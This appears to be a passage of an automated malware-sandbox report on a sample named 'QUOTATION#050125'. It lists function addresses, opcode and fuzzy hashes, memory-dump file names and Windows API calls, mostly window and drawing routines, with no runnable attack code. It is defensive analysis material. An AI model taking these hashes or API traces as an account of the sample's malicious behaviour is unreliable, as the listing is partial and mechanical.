                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                      • Instruction ID: d18c819ce543c4553193f1225d589858fb06fe27032c3b3b226e889b80d46367
                                                                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                      • Instruction Fuzzy Hash: 48020D71E012599FEF14CFA9C880AADFBF1EF48314F25416AD919F7384D731A9428B94
                                                                                      Function 000E1394 Relevance: .4, Instructions: 356COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 899a16297d210d7e7672f3c153c609dbde63c11d9928f91f636dff1ce4b81359
                                                                                      • Instruction ID: bc2c1dedd39e8828160fc06ed10cf70aa03c8c863afefed875ba76125bb85fa9
                                                                                      • Opcode Fuzzy Hash: 899a16297d210d7e7672f3c153c609dbde63c11d9928f91f636dff1ce4b81359
                                                                                      • Instruction Fuzzy Hash: 1DD1D8722085E24ECBAD4A3B84700BABFF16B8236130D479ED4F7EA5C2ED34D954D660
                                                                                      Function 000F9EEE Relevance: .3, Instructions: 294COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 30ca1fd8d81b0cba7fb012033828080419b2c722fd7c69da08ce72450fbada8e
                                                                                      • Instruction ID: 433662b67baf602453a4bd049faa5d086f73dbfdd06aff0391860febcfbb5e02
                                                                                      • Opcode Fuzzy Hash: 30ca1fd8d81b0cba7fb012033828080419b2c722fd7c69da08ce72450fbada8e
                                                                                      • Instruction Fuzzy Hash: 85B1D020E2AF414DD22396398C75336B65CBFBB6D5B91D71BFC2A74E62EB2186C34140
                                                                                      Function 000E1C77 Relevance: .3, Instructions: 254COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                      • Instruction ID: 83586e4f31aa9770d4b25d885616c28e0874cee028d1af9f8970685c8eb0108f
                                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                      • Instruction Fuzzy Hash: 7091757260D0E34EDB69463B85744BEFFE15F923A131A079EE4F2EA1C1EE348954D620
                                                                                      Function 000E1F32 Relevance: .2, Instructions: 244COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                      • Instruction ID: 037939f9f7862a6f396234533332b665b873ce0395ad2e1b55692462f9fde572
                                                                                      • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                      • Instruction Fuzzy Hash: A79178722090E34DDBAD423B857407EFFE55B923A131A07ADD4F2EB1D6EE24CA54D620
                                                                                      Function 000E19B0 Relevance: .2, Instructions: 240COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                      • Instruction ID: 930e137f5fe05022a88224b11b57d7163c88818408e11b138ed99675d706f060
                                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                      • Instruction Fuzzy Hash: 5A9110722090E34EDBA9467B85740BEFFE15B923A131E07AED4F2EA1C1FE348554D620
                                                                                      Function 000E7A4A Relevance: .2, Instructions: 237COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2a4ed5df518b71ff1141161c4ca5776b39a58ea48c0641888a82d93f6dd532c0
                                                                                      • Instruction ID: 43e36337a6b00c3a361aec025f8c72ffa79d6bd9efd61115ee6c8d4604ec960c
                                                                                      • Opcode Fuzzy Hash: 2a4ed5df518b71ff1141161c4ca5776b39a58ea48c0641888a82d93f6dd532c0
                                                                                      • Instruction Fuzzy Hash: F5616A716087C99EDAB4992B4855BFF33D8DF81700F28492DE94EFB282D7119E42C316
                                                                                      Function 000E7CA7 Relevance: .2, Instructions: 237COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a3676d619fea96b7672b781962a8bd76f7ee755a8a224e947ea0908db589811d
                                                                                      • Instruction ID: 0175598e64e41a756dca68d92176390ebbe10a6eced97735d38570edcbc48924
                                                                                      • Opcode Fuzzy Hash: a3676d619fea96b7672b781962a8bd76f7ee755a8a224e947ea0908db589811d
                                                                                      • Instruction Fuzzy Hash: 1E61897120C7C96EDAB84A2B4C91BFE23E9DF46700F10495AE84FFB382DA129D428311
                                                                                      Function 000E1706 Relevance: .2, Instructions: 232COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                      • Instruction ID: 851cbf7890a22c5ec2f426a73c8a012cebcbc9b46d1f71a18e656659bbd6678b
                                                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                      • Instruction Fuzzy Hash: 888150726090E34EDBAD423B85744BEFFE15B923A131A079ED4F2DA1C2EE348554E620
                                                                                      Function 00E1B6F0 Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288643282635.0000000000E18000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E18000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_e18000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                      • Instruction ID: cd2e0fe50061a532a12336db2773766df0a334dca6f9c1358059397dbfb323d0
                                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                      • Instruction Fuzzy Hash: BA41A271D1051CEBCF48CFADC991AEEBBF2AF88201F648299D516AB345D730AB41DB50
                                                                                      Function 00132046 Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5ee4ba6130d4f83a450e2360fc425a827998d09906dc4116e31f1cd4938c05e9
                                                                                      • Instruction ID: 6a96f9a6200a82dd70e9322c4ec9f8a680acdde617eb360df9d1431bad13ed2b
                                                                                      • Opcode Fuzzy Hash: 5ee4ba6130d4f83a450e2360fc425a827998d09906dc4116e31f1cd4938c05e9
                                                                                      • Instruction Fuzzy Hash: 9E21E7322216118BDB2CCF79C8236BE73E5A754320F14862EE4A7C37D0DE39A944CB80
                                                                                      Function 00E1B5E0 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288643282635.0000000000E18000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E18000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_e18000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                      • Instruction ID: 9e26ba3f5a80d542a1f4a09ae4ef7dfbfe4c9d9da2f92e7c640b78dbc3acdda0
                                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                      • Instruction Fuzzy Hash: D9019D78E01209EFCB44DF98C5909AEF7F5FB58310F208699E819A7341E730AE81DB80
                                                                                      Function 00E1B580 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288643282635.0000000000E18000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E18000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_e18000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                      • Instruction ID: 5598ae65c1e79ae0641f4fafc2f7ce1567163755062cb5ff326e7892ef642013
                                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                      • Instruction Fuzzy Hash: 24019278A01109EFCB44DF98C5909AEF7F6FF48310F208599E819A7341E730AE81DB80
                                                                                      Function 00E19F40 Relevance: .0, Instructions: 6COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288643282635.0000000000E18000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E18000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_e18000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                      Function 00142ADE Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DeleteObject.GDI32(00000000), ref: 00142B30
                                                                                      • DeleteObject.GDI32(00000000), ref: 00142B43
                                                                                      • DestroyWindow.USER32 ref: 00142B52
                                                                                      • GetDesktopWindow.USER32 ref: 00142B6D
                                                                                      • GetWindowRect.USER32(00000000), ref: 00142B74
                                                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00142CA3
                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00142CB1
                                                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142CF8
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00142D04
                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00142D40
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142D62
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142D75
                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142D80
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00142D89
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142D98
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00142DA1
                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142DA8
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00142DB3
                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142DC5
                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,0015FC38,00000000), ref: 00142DDB
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00142DEB
                                                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00142E11
                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00142E30
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00142E52
                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0014303F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                      • API String ID: 2211948467-2373415609
                                                                                      • Opcode ID: 7363406f8dcebc8360c5071a2104ff5fb8dcd94dc4e7ec7224bdaa4fea7c5db3
                                                                                      • Instruction ID: 4de34e1fb412a2601c910401f35bf77e640deb5981bd2cc4c83d74c21d60fe5b
                                                                                      • Opcode Fuzzy Hash: 7363406f8dcebc8360c5071a2104ff5fb8dcd94dc4e7ec7224bdaa4fea7c5db3
                                                                                      • Instruction Fuzzy Hash: 52025A71900205EFDB14DF64CC89EAE7BB9FB48711F048158F915AB2A1CB70AE81CFA0
                                                                                      Function 001570D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0015712F
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00157160
                                                                                      • GetSysColor.USER32(0000000F), ref: 0015716C
                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00157186
                                                                                      • SelectObject.GDI32(?,?), ref: 00157195
                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 001571C0
                                                                                      • GetSysColor.USER32(00000010), ref: 001571C8
                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 001571CF
                                                                                      • FrameRect.USER32(?,?,00000000), ref: 001571DE
                                                                                      • DeleteObject.GDI32(00000000), ref: 001571E5
                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00157230
                                                                                      • FillRect.USER32(?,?,?), ref: 00157262
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00157284
                                                                                        • Part of subcall function 001573E8: GetSysColor.USER32(00000012), ref: 00157421
                                                                                        • Part of subcall function 001573E8: SetTextColor.GDI32(?,?), ref: 00157425
                                                                                        • Part of subcall function 001573E8: GetSysColorBrush.USER32(0000000F), ref: 0015743B
                                                                                        • Part of subcall function 001573E8: GetSysColor.USER32(0000000F), ref: 00157446
                                                                                        • Part of subcall function 001573E8: GetSysColor.USER32(00000011), ref: 00157463
                                                                                        • Part of subcall function 001573E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00157471
                                                                                        • Part of subcall function 001573E8: SelectObject.GDI32(?,00000000), ref: 00157482
                                                                                        • Part of subcall function 001573E8: SetBkColor.GDI32(?,00000000), ref: 0015748B
                                                                                        • Part of subcall function 001573E8: SelectObject.GDI32(?,?), ref: 00157498
                                                                                        • Part of subcall function 001573E8: InflateRect.USER32(?,000000FF,000000FF), ref: 001574B7
                                                                                        • Part of subcall function 001573E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001574CE
                                                                                        • Part of subcall function 001573E8: GetWindowLongW.USER32(00000000,000000F0), ref: 001574DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                      • String ID:
                                                                                      • API String ID: 4124339563-0
                                                                                      • Opcode ID: a475995d585089aa2732492854a22c0205547f779974a8f60e7c012916fa4975
                                                                                      • Instruction ID: 02c6def1ba9cedb79cbe5dbbef64dfce3deb2ab31fdc2b09f191e32d9507cd87
                                                                                      • Opcode Fuzzy Hash: a475995d585089aa2732492854a22c0205547f779974a8f60e7c012916fa4975
                                                                                      • Instruction Fuzzy Hash: F1A1A572108701FFD7019F60DC49E5BBBAAFF89322F100A19F9629A5E1D771E984CB91
                                                                                      Function 000D8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?,?), ref: 000D8E14
                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00116AC5
                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00116AFE
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00116F43
                                                                                        • Part of subcall function 000D8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000D8BE8,?,00000000,?,?,?,?,000D8BBA,00000000,?), ref: 000D8FC5
                                                                                      • SendMessageW.USER32(?,00001053), ref: 00116F7F
                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00116F96
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00116FAC
                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00116FB7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                      • String ID: 0
                                                                                      • API String ID: 2760611726-4108050209
                                                                                      • Opcode ID: 08baadfc898c45e0640acd6cb7c42f2ac840e1681ffea36970423f2431de854f
                                                                                      • Instruction ID: b8aa2e3e0aeb097bd7c1089dd375ae34cdd0dc0c80e05c1aedd0b743d68694cf
                                                                                      • Opcode Fuzzy Hash: 08baadfc898c45e0640acd6cb7c42f2ac840e1681ffea36970423f2431de854f
                                                                                      • Instruction Fuzzy Hash: 2B128C30205312EFDB29CF14D858BEAB7E5FB44305F14856AF4858B661CB32A8D2DFA1
                                                                                      Function 00142711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000), ref: 0014273E
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0014286A
                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 001428A9
                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 001428B9
                                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00142900
